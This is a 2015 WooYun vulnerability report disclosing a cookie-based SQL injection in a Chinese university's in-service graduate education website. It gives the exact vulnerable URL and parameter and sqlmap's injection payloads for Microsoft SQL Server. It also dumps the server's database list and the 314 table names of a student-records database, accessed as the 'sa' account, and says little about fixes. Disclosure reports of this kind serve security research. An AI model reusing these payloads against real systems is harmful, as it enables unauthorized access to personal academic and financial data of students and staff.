当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091711

漏洞标题:北方工业大学在职研究生教育网Cookie注入

相关厂商:北方工业大学

漏洞作者: 黑白

提交时间:2015-01-15 12:22

修复时间:2015-01-20 12:24

公开时间:2015-01-20 12:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-15: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Cookie注入

详细说明:

Cookie注入

漏洞证明:

注入点:http://pdjx.ncut.edu.cn/common/gzzd.asp?lb=rule
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: Cookie
Parameter: lb
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lb=rule' AND 2702=2702 AND 'JdaR'='JdaR
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lb=rule' AND 4131=CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(118)
+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4131=4131) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(98)+CHAR(119)+CHAR(108)+CHAR(113))) AND 'tTmZ'='tTmZ
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: lb=rule' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(105)+C
HAR(118)+CHAR(118)+CHAR(113)+CHAR(106)+CHAR(77)+CHAR(71)+CHAR(115)+CHAR(69)+CHAR
(77)+CHAR(108)+CHAR(105)+CHAR(78)+CHAR(73)+CHAR(113)+CHAR(98)+CHAR(119)+CHAR(108
)+CHAR(113)--
---
[21:16:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[21:16:06] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\pdjx.ncut.edu.cn'
[*] shutting down at 21:16:06
available databases [14]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] webds
[*] webfp
[*] weblqcx
[*] webqyds
[*] webtcz
[*] webyybm
[*] zyf_jiaowu
[*] zyxw
current user: 'sa'
current database: 'zyf_jiaowu'
Database: zyf_jiaowu
[314 tables]
+---------------------+
| TEMP_CJD |
| TEMP_FX_CJD |
| V_xsinfo |
| all_info_table_bf |
| all_info_table_bf |
| b_TableInfo |
| b_bj |
| b_bm |
| b_bxcc |
| b_bxfs |
| b_bxlx |
| b_bzjh |
| b_bzxz |
| b_cflb |
| b_cfyy |
| b_cjlb |
| b_clrzt |
| b_define |
| b_dq |
| b_ggjh |
| b_gjyj_cgkl |
| b_gjyj_cylb |
| b_gjyj_jldj |
| b_gjyj_xmjb |
| b_gjyj_xmjd |
| b_gjyj_zjly |
| b_jbb |
| b_jbb |
| b_jffs |
| b_jfz |
| b_jllb |
| b_jsb |
| b_jsb |
| b_jsfq |
| b_jshj |
| b_jslx |
| b_jszt |
| b_jtcy |
| b_jxjcfh |
| b_kcdl |
| b_kcdl |
| b_kclb |
| b_kcxz |
| b_kl |
| b_kslx |
| b_ktlb |
| b_mz |
| b_nd |
| b_pkfl |
| b_rwxz |
| b_school |
| b_scope |
| b_sfxs |
| b_shhd |
| b_sjhjlb |
| b_sjhjlb |
| b_sjhjlx |
| b_sjjx |
| b_sylb |
| b_tss |
| b_xb |
| b_xgb_bzffb |
| b_xgb_bzffb |
| b_xgb_bzje |
| b_xgb_bzsb |
| b_xgb_cyb |
| b_xgb_drzw |
| b_xgb_gsje |
| b_xgb_jldj |
| b_xgb_jtcy |
| b_xgb_jtzt |
| b_xgb_jxjbs |
| b_xgb_jxjbs |
| b_xgb_jxjje |
| b_xgb_qgzxgw |
| b_xgb_qgzxxs |
| b_xgb_ssfq |
| b_xgb_ssxx |
| b_xgb_zxdk |
| b_xjbdlb |
| b_xjbdyy |
| b_xjjt |
| b_xkml |
| b_xl |
| b_xq |
| b_xqq |
| b_xw |
| b_xxkc |
| b_xxzy |
| b_xybz |
| b_xzydm |
| b_zbm |
| b_zclb |
| b_zclb |
| b_zkjs |
| b_zslb |
| b_zszt |
| b_zxbj |
| b_zy |
| b_zzmm |
| dtproperties |
| h_bzjh |
| h_cjlsjl |
| h_js |
| h_ljkcpscj |
| h_qxkc |
| h_xklsjl_bak |
| h_xklsjl_bak |
| h_xpjdata |
| h_xwmod |
| h_xybz |
| h_zcls |
| lqk2013 |
| lqk2014 |
| pangolin_test_table |
| sqlmapoutput |
| sysconstraints |
| syssegments |
| t_KKXXPK |
| t_KKXXPK |
| t_allbm |
| t_bkright |
| t_bysh_bak |
| t_bysh_bak |
| t_bysh_kt |
| t_cwcprint |
| t_dalsh |
| t_delete_kc |
| t_dkzc |
| t_errorcode |
| t_fcbb |
| t_fcbb |
| t_fcbb |
| t_fcbtmp |
| t_fccj |
| t_fczkt |
| t_freekt |
| t_fx |
| t_gjyj_jxcgcy |
| t_gjyj_jxcgdw |
| t_gjyj_jxcggk |
| t_gjyj_jxcgjl |
| t_gjyj_xmcy |
| t_gjyj_xmgk |
| t_gzlcs |
| t_gzlcs |
| t_gzlk5 |
| t_gzlk6 |
| t_gzlk7 |
| t_gzlright |
| t_hbbzbm |
| t_hbbzbm |
| t_hkmx |
| t_hkmx |
| t_jflb |
| t_jhbw |
| t_jmsy |
| t_jshj |
| t_jszy |
| t_jxjc |
| t_jxrl |
| t_jxzxjcdy |
| t_jxzxjcdy |
| t_jxzxjcfj |
| t_jxzxjchbbm |
| t_jxzxjchbbm |
| t_ksbmlx |
| t_ksbmmd |
| t_ksbmsystem |
| t_ksbmyx |
| t_ksbmzy |
| t_ksdy |
| t_ksdyyxj |
| t_ksdyyxj |
| t_ksjkjs |
| t_ksjsyx |
| t_ksktap |
| t_ksktap |
| t_ksktyx |
| t_kspckt |
| t_ksqj |
| t_ksxsap |
| t_kszkt |
| t_kszkt |
| t_kszyx |
| t_kszyyx |
| t_ktktlb |
| t_ktktlb |
| t_ktlog |
| t_ljkcpscj |
| t_ljkcpscj |
| t_ljkcrwgb |
| t_ljkcsq |
| t_ljkczcj |
| t_lqzd |
| t_lxs |
| t_modzcfs |
| t_mxksap |
| t_mxksap |
| t_mxy |
| t_oplog |
| t_pjxf_all |
| t_pjxf_one |
| t_pkdy |
| t_pkdyyx |
| t_pkjsdy |
| t_pkjsyx |
| t_pkkb |
| t_pkkbsjhj |
| t_pkkt |
| t_pkktyx |
| t_pklsyx |
| t_pkqj |
| t_pkright |
| t_pkzyx |
| t_pkzyyx |
| t_qfmx |
| t_receive |
| t_rightname |
| t_send |
| t_sfls |
| t_sfyt |
| t_shhd |
| t_sjkc |
| t_sjxx |
| t_spzszt |
| t_suggest |
| t_sxw |
| t_sxx |
| t_system |
| t_tdkc_xs |
| t_tdkc_xs |
| t_tsxs |
| t_tuikelog |
| t_userdisright |
| t_userdisright |
| t_userright |
| t_webmenu |
| t_xfbz |
| t_xfjm |
| t_xfxf |
| t_xgb_cf |
| t_xgb_jxjffb |
| t_xgb_jxjffb |
| t_xgb_py |
| t_xgb_wmss |
| t_xgb_xjjt |
| t_xhkhkcdj |
| t_xhkhkcdj |
| t_xhkhkcgb |
| t_xkzdxf |
| t_xpj_pjjg |
| t_xpj_pjjgzb |
| t_xpj_pjxm |
| t_xpj_pjzbnr |
| t_xpj_pjzbnr |
| t_xpjall |
| t_xpjcj |
| t_xpjfz |
| t_xpjhmd |
| t_xpjkg |
| t_xpjktfl |
| t_xpjlzb |
| t_xpjszb |
| t_xsbd |
| t_xsbd |
| t_xsda |
| t_xsinfo_bf |
| t_xsinfo_bf |
| t_xsmd |
| t_xsqf |
| t_xsrxjf |
| t_xsxjbd |
| t_xsxk |
| t_xsxx |
| t_xszp |
| t_xuefen_kt |
| t_xuefen_kt |
| t_xxfb |
| t_xyhmd |
| t_xyjgcs |
| t_yybm |
| t_yyzsbm |
| t_zc |
| t_zhjf |
| t_zkjs |
| t_zsbm |
| t_zsjbxx |
| t_zsztlog |
| t_zsztlog |
| temp_bk |
| temp_jd |
| temp_kc |
| temp_tdkc |
| temp_xh |
| ttt_hongxin2014 |
| ttt_jsxx |
| ttt_lqk2014_102 |
| v_TempJH |
| v_cjjd |
| v_gzlbybm |
| v_gzlf |
| v_gzlh |
| v_xscj |
| xfxx20120502 |
| zyxwlqk_2012zs |
| zyxwlqk_2013zs |
| zyxwt_pyfa |
| zyxwt_xnds |
| zyxwt_xsinfo |
| zyxwt_xsinfo |
| zyxwt_xwlw |
| zyxwt_xwxxcj |
| zyxwxfxx |
+---------------------+

修复方案:

过滤!

版权声明:转载请注明来源 黑白@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-20 12:24

厂商回复:

最新状态:

暂无